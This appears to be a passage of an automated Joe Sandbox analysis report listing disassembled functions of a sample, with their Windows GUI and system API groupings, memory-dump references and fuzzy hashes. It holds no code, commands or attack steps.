                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEventInflateMessageMouseParentSendTrackUpdateWindow
                                                                            • String ID: iii$
                                                                            • API String ID: 2492745705-462628325
                                                                            • Opcode ID: 2fe2a5ffbbe370e69f16cc8f4a1b6ab689d5a2eca5f4a4073c8456b908c10b46
                                                                            • Instruction ID: 92071a7e7c5ea8194467fbd5af9665b5459e8cddfe913b74ba258fdb208378e4
                                                                            • Opcode Fuzzy Hash: 2fe2a5ffbbe370e69f16cc8f4a1b6ab689d5a2eca5f4a4073c8456b908c10b46
                                                                            • Instruction Fuzzy Hash: FFB19F3620069087EB26DB23E4547EE77A1F78CF98F180225DB5A4BBA5CF7AD945C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014008060C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 91windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color
                                                                            • String ID: $b
                                                                            • API String ID: 2811717613-2505604640
                                                                            • Opcode ID: 1f1eebc8388768d1e00e08cc88573fb66d0a91dba17edcf2c5092e8d02e67602
                                                                            • Instruction ID: eda85a597ed8addad1c25d791de72f9ebae6a4baa878bfdbe40bdd4c5f8dc2c9
                                                                            • Opcode Fuzzy Hash: 1f1eebc8388768d1e00e08cc88573fb66d0a91dba17edcf2c5092e8d02e67602
                                                                            • Instruction Fuzzy Hash: 3E413276A14A408BE751DF16F848B9A77A1F38CBA9F544115EB8947BB8CBBCC840CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140058580 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                            • String ID: System
                                                                            • API String ID: 46613423-3470857405
                                                                            • Opcode ID: fe12a67df7abab3f56380aaaee1d5e4399ecba710e16424cea40da4aff6efe63
                                                                            • Instruction ID: 21fdedab7acfa7cb03b9ad71d12b663ee932c52a3aba46163a09143153753ead
                                                                            • Opcode Fuzzy Hash: fe12a67df7abab3f56380aaaee1d5e4399ecba710e16424cea40da4aff6efe63
                                                                            • Instruction Fuzzy Hash: 86215E35304B9096EB26DB22F818BDA77A1F74CB80F444529EE8D57BA4DF7DC50A8B00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014009A374 Relevance: 13.8, APIs: 9, Instructions: 349timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Create$Timer$CopyIndirect$CombineCursorEventFocusInflateIntersectKillMessageMouseParentReleaseSendTrackUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2524255646-0
                                                                            • Opcode ID: 281531fa7e87e286c2c961035916e19313e3dd5e80cd303dd19577a3b0328d38
                                                                            • Instruction ID: 37362e1a807054d8c51cc00f1b38382e53b3556072748842684c5a3e28aa9c1a
                                                                            • Opcode Fuzzy Hash: 281531fa7e87e286c2c961035916e19313e3dd5e80cd303dd19577a3b0328d38
                                                                            • Instruction Fuzzy Hash: E3F1923160068086EB26DB67E4447EE73A0F789BD4F144225EB6A476F4DF7CD882C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013866C Relevance: 13.8, APIs: 9, Instructions: 288windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientParentScreen$DestroyMenu$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3328890127-0
                                                                            • Opcode ID: 69b5f880db908b5f5960674ab7e35b71aba28e59b64114bcdcd527a13a4ccd81
                                                                            • Instruction ID: 560825b877e215d92fd2939ab6f46e9ca938f6008b0f79add04fa8548141971a
                                                                            • Opcode Fuzzy Hash: 69b5f880db908b5f5960674ab7e35b71aba28e59b64114bcdcd527a13a4ccd81
                                                                            • Instruction Fuzzy Hash: BAC12376615B8586FA16DB67E8547EE63A0FB8CF84F084526DF4A4BBA5DF38C401C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014012A3B8 Relevance: 13.8, APIs: 9, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ExceptionThrow_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3659049137-0
                                                                            • Opcode ID: 5d17eaf185ffdb978cd8ed29a493107ab7ab525767a99fe0107cf950e07950d7
                                                                            • Instruction ID: 6c4419ad66843e1d7f34fdb89ae797a7b050ea5c70af3a74b15f9c8b7f90a012
                                                                            • Opcode Fuzzy Hash: 5d17eaf185ffdb978cd8ed29a493107ab7ab525767a99fe0107cf950e07950d7
                                                                            • Instruction Fuzzy Hash: 3EB1AF76300B8082EA6A9F57E5043DE67A5F788FD0F98402ACF59677A5DFB9D492C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014010A42C Relevance: 13.7, APIs: 9, Instructions: 231windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Message$InvalidatePostRectSendUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 896913059-0
                                                                            • Opcode ID: b5b3f40dc9ddc2ac73b74f8c30526cafc64e641cca9fd8d94fddf65cf1e4f070
                                                                            • Instruction ID: 786f57cf6a034a787e6a78ada9e280f1ffd984d3bdf6938dc813696cabc2fe86
                                                                            • Opcode Fuzzy Hash: b5b3f40dc9ddc2ac73b74f8c30526cafc64e641cca9fd8d94fddf65cf1e4f070
                                                                            • Instruction Fuzzy Hash: 76A12D7530164141EE5BDB63E4697EA63A1BB8CFC4F488126DF4A4BBB2DE7DC8068340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400A46F0 Relevance: 13.7, APIs: 9, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Capture$ClientReleaseScreenWindow$CursorFromPointRectRedraw
                                                                            • String ID:
                                                                            • API String ID: 2024412728-0
                                                                            • Opcode ID: b1ab41c28cc93dd6ad6c82fcc193da542691f8e9f602a6fe679747054a3f0f47
                                                                            • Instruction ID: 20cf241f7fa661cc61fec453d85edec8eb5b304386ee8acfee547d513252cafa
                                                                            • Opcode Fuzzy Hash: b1ab41c28cc93dd6ad6c82fcc193da542691f8e9f602a6fe679747054a3f0f47
                                                                            • Instruction Fuzzy Hash: D8A1393A711A8186EB19DF66E6503ED2361F79DBC0F085226EF1A57BA1CF34D4A1CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400980B8 Relevance: 13.7, APIs: 9, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: UpdateWindow$BeepClientMessageScreen
                                                                            • String ID:
                                                                            • API String ID: 1712693409-0
                                                                            • Opcode ID: 2c9b4c39bf5f28b4a4ca781e88612102ef142eaaf9e77b825b2f4a2796aa806f
                                                                            • Instruction ID: 755874ce497f43334733f2dea8404b1d3a0f2b2036e7338512a7f5edf34628af
                                                                            • Opcode Fuzzy Hash: 2c9b4c39bf5f28b4a4ca781e88612102ef142eaaf9e77b825b2f4a2796aa806f
                                                                            • Instruction Fuzzy Hash: 84917B36214A5086FA26EB63E8547ED27A1B78CFC4F048126EF1A57BB5DF78C942C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140034514 Relevance: 13.7, APIs: 9, Instructions: 172windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count$AppendInsertStateString
                                                                            • String ID:
                                                                            • API String ID: 420201382-0
                                                                            • Opcode ID: 300b395d40a23efb28ae1050f738a76f4d140311f655c85d3d6aba0b5abd86f1
                                                                            • Instruction ID: 2cbc890e1c64921532c3d4c0cf752f4bb3199d1f1f9ad9b6e48402e9f435056c
                                                                            • Opcode Fuzzy Hash: 300b395d40a23efb28ae1050f738a76f4d140311f655c85d3d6aba0b5abd86f1
                                                                            • Instruction Fuzzy Hash: D871B136614B8086EB12CF56E84879B7761F78ABD8F110115EF9A4BBB8DF78D845CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C8704 Relevance: 13.7, APIs: 9, Instructions: 164windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                            • String ID:
                                                                            • API String ID: 4186786570-0
                                                                            • Opcode ID: a00684709e33c799b5aa593a79369bafc3ef88f620e72fde29d9320e353ce633
                                                                            • Instruction ID: 2559d5deb80f152145e80284b1dc575e59192adf058a160f63a7f0eb9bbeaacb
                                                                            • Opcode Fuzzy Hash: a00684709e33c799b5aa593a79369bafc3ef88f620e72fde29d9320e353ce633
                                                                            • Instruction Fuzzy Hash: 4A614536708B4186FB6ADB63D8847ED27A2BB8CBC4F584425EF4A57BA4DF34C8458704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014004BFFC Relevance: 13.6, APIs: 9, Instructions: 148timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem$AddressAttributesHandleModuleProcSize_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3830226466-0
                                                                            • Opcode ID: d32400b487f652f36b1a60b8f55ff821d510fb76d198eeb4dabba01cb39b6aa8
                                                                            • Instruction ID: b7f63201505ef461441adeef1ae1f77213408ea04441c11dff7550717572fd26
                                                                            • Opcode Fuzzy Hash: d32400b487f652f36b1a60b8f55ff821d510fb76d198eeb4dabba01cb39b6aa8
                                                                            • Instruction Fuzzy Hash: E1619F32310A4596FB629F76D850BED23B4E74DB98F414622EB1A87AF9EF70C505C344
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400720E0 Relevance: 13.6, APIs: 9, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureClientMessageMetricsScreenSendSystem$FocusRelease
                                                                            • String ID:
                                                                            • API String ID: 3871486171-0
                                                                            • Opcode ID: d345ab7c2611c5cff37ad9dc88c8bb5c10f38ae6950e1ae83df53fa9334e3945
                                                                            • Instruction ID: 84a061a98f69cf867a75a6a23783c6823e609d4056cb8a54c04d7bab0c89e74e
                                                                            • Opcode Fuzzy Hash: d345ab7c2611c5cff37ad9dc88c8bb5c10f38ae6950e1ae83df53fa9334e3945
                                                                            • Instruction Fuzzy Hash: D7518D36201A8096EB6ACF66D5947DC67A0F78CBD8F040126EF1E577A6DF78C8928340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400807AC Relevance: 13.6, APIs: 9, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateObject$HashRectSelect$CombineCompatibleImplImpl::Pixel
                                                                            • String ID:
                                                                            • API String ID: 189907385-0
                                                                            • Opcode ID: 2de07991f312bece601cc44d6cca946f5eb6ad8800321375910915a212bc7d73
                                                                            • Instruction ID: c862973e160dec7f4f7c19c32a07d30f9d14563875d2e9a7a9822993c2ed7dfd
                                                                            • Opcode Fuzzy Hash: 2de07991f312bece601cc44d6cca946f5eb6ad8800321375910915a212bc7d73
                                                                            • Instruction Fuzzy Hash: 52416D36700A4099FB52DB63D8547DE6372B74CBC8F404126EF5A677A9DE34C90AC350
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400347B4 Relevance: 13.6, APIs: 9, Instructions: 97windowCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$Remove$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 1900339754-0
